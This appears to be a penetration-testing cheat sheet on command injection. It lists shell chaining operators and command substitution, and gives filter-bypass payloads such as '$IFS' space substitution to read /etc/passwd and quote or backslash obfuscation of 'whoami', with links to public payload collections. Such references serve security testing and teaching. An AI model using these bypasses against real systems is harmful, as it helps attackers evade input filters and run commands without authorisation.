Command Injection

Chaining and Invoking

;    # Executes one command and then another
&    # Executes a command in the background, followed by the other one
|    # Redirects the output the first command as input to the second command
&&   # Executes the second command if the first command succeeds
||   # Executes the second command if the first command fails

Its also possible to inject command via command substitution, where the output of a command is captured and used in another context

$(command)    # Both windows and linux systems
`command`     # Only linux systems

Bypasses

• https://book.hacktricks.xyz/linux-hardening/bypass-bash-restrictions#common-limitations-bypasses

• https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#filter-bypasses

Space Bypass

Using Internal Field Separator $IFS to avoid using spaces on commands

cat${IFS}/etc/passwd

Blacklisted Words

# Quotes
w'h'o'a'm'i'     # Both windows and linux systems
'w'h'o'a'm'i     # Only linux systems
wh''oami         # Both windows and linux systems

# Backslashes
\w\h\o\a\m\i     # Only linux systems
w\h\o\a\m\i      # Only linux systems

# $()
wh$()oami        # Only linux systems
wh$(echo oa)mi   # Only linux systems

# ``
wh``oami         # Only linux systems
wh`echo oa`mi    # Only linux systems

# $@
wh$@oami         # Only linux systems

References

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection https://book.hacktricks.xyz/pentesting-web/command-injection